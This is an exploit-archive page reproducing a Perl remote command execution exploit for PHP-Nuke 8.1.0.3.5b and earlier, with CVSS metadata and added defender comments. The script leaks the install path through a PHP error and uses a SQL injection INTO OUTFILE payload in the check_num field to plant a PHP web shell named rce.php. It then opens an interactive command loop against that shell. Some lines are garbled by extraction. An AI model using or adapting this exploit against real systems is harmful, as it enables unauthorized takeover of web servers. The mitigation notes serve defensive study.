





PHP-Nuke 8.1.0.3.5b and below remote command execution

CVE Category Price Severity
N/A (No CVE assigned) CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Price not disclosed High
Author Risk Exploitation Type Date
Unknown High Remote 2010-07-13
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010070069

Below is a copy:

# PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploit
# Author/s: Dante90 & yawn
# Contact Us: www.unitx.net
# Requirements: magic_quotes_gpc : off
# Greetings: #[email protected] | #[email protected]
 
#   You will remember, Watson, how the dreadful business of the
#       Abernetty family was first brought to my notice by the depth which the
#       parsley had sunk into the butter upon a hot day.
#                                               -- Sherlock Holmes
 
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Cookies;
 
# Prints the usage banner to STDOUT. Takes no arguments and returns whatever
# the last print returns; the caller ignores it.
# NOTE(review): the banner advertises three arguments (host, username,
# password), but the visible script only reads the first one. The trailing
# "n" in each string is presumably a "\n" whose backslash was lost when the
# page was extracted -- confirm against the original advisory.
sub Nuke::Usage {
    print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b Remote Command Execution Exploitn";
    print " ------------------------------------------------------ n";
    print " * USAGE:                                             *n";
    print " * cd [Local Disk]:\                                  *n";
    print " * perl name_exploit.pl [host] [username] [password]  *n";
    print " * -> REMEMBER TO ADD THE FINAL / TO THE HOSTNAME <-  *n";
    print " ------------------------------------------------------ n";
    print " *             Powered By Dante90 & yawn              *n";
    print " *                  www.unitx.net                  *n";
    print " ------------------------------------------------------ n";
}
 
#VARS
# Clear the terminal: the command name is a fixed literal chosen from $^O,
# so no external input reaches this system() call.
system $^O eq 'MSWin32' ? 'cls' : 'clear';
Nuke::Usage();
# Base URL of the target, taken from the first command-line argument; the
# script dies if it is missing. Later code appends paths directly to it,
# which is why the banner asks for a trailing "/".
my $host = shift || die;
# Receives each line typed by the operator in the final loop.
my $cmd;
# PHP one-liner that the injection step writes to rce.php on the target; it
# hands the "cmd" query parameter to PHP's system(). For defenders, a file
# with this content under the web root is an indicator of compromise.
# NOTE(review): the quoting on the next two lines looks damaged by page
# extraction (the second line reads like a wrapped comment).
my $shell = "<?php echo system($_GET["cmd"]); ?>"; # Change Here to
Set your custom shell (for example use system() );
# Cookie jar with no backing file, attached to the user agent below so
# cookies set by the target are sent back on later requests.
my $cookies = HTTP::Cookies->new;
my $request = LWP::UserAgent->new;
# Fixed User-Agent value. "Mozilla 5/0" is not the form real browsers send
# ("Mozilla/5.0"), so the literal is usable as a log-search signature.
$request->agent("Mozilla 5/0");
$request->cookie_jar($cookies);
#END VARS
# Requests themes/NukeNews/theme.php directly (outside the normal page flow)
# and searches the response body for a PHP "No such file or directory in
# <b>...</b> on line" error message.
# Returns: the captured filesystem path on a match, otherwise the string
# "failed".
# Defender note: the step depends on the target echoing PHP errors to the
# client; presumably, turning off display_errors in production removes
# this leak -- verify on the deployment in question.
# NOTE(review): the pattern as listed contains an unescaped "/" inside
# "</b>", which looks like extraction damage.
sub Full_Path_Disclosure() {
    my $Get = $request->get($host.'themes/NukeNews/theme.php');
    if ($Get->content =~ /No such file or directory in <b>(.+?)</b> on line/i) {
        return $1;
    } else {
        return "failed";
    }
}
 
# Step 1: learn the absolute install path from the leaked PHP error, and
# stop if the target did not disclose it.
print " * Getting Full Pathn";
my $path = Full_Path_Disclosure();
die " * Failed Path Extraction" if ($path eq "failed");
# Appears intended to strip the "themes/NukeNews/theme.php" suffix (either
# slash style) so that $path is the web root directory.
# NOTE(review): this substitution and the backslash handling below are
# garbled in the listing; read them as intent, not as working code.
$path =~ s/themes(/|\)NukeNews(/|\)theme.php//g;
print " * Full Path Found: $pathn";
if ($path =~ m/\/) {
    $path =~ s/\/\\\\/g;
}
# Step 2: the root cause. A POST to modules.php (name=Your_Account,
# op=activate) carries a check_num form field holding a UNION SELECT ...
# INTO OUTFILE statement that writes $shell to rce.php under $path. The
# flaw is therefore SQL injection (CWE-89); command execution is its
# consequence. The listing's header states magic_quotes_gpc must be off.
# Mitigation: bind check_num as a query parameter. INTO OUTFILE also needs
# the MySQL FILE privilege, so revoke it from the application's database
# account and restrict secure_file_priv. Detection: POSTs to op=activate
# whose check_num contains UNION or INTO OUTFILE, and an unexpected rce.php
# in the web root.
print " * Injecting Shell To $hostn";
my $req2= $request->post($host."modules.php?name=Your_Account&op=activate&username=WTF",
    {
        check_num => "'UNION/**/SELECT 1,2,3,4,5,6,'".$shell."' FROM
`nuke_authors` INTO OUTFILE '$path"."rce.php",
    },
    Referer => $host."index.php");
# The POST response in $req2 is never inspected, so the "Successfully
# Completed" line below is printed whether or not the write happened.
print " * Injecting Successfully Completedn";
print " * Shell now available on $host"."rce.phpn";
print " * Connecting to remote shelln";
sleep(4);
print " * Connected.. Type "quit" to quitn";
# Step 3: interactive loop. Each input line is sent as the "cmd" query
# parameter of a GET to rce.php and the response body is printed; "quit"
# ends the loop. Every command therefore lands in the target's access log.
# Since $host is expected to end in "/" and this line adds another, the
# logged path presumably shows a doubled slash before rce.php.
while() {
        print "* root@backdoor ~$ ";
        $cmd = <>;
        chomp($cmd);
        last if $cmd eq "quit";
        $req2 = $request->get($host."/rce.php?cmd=".$cmd);
        print $req2->content."n";
}


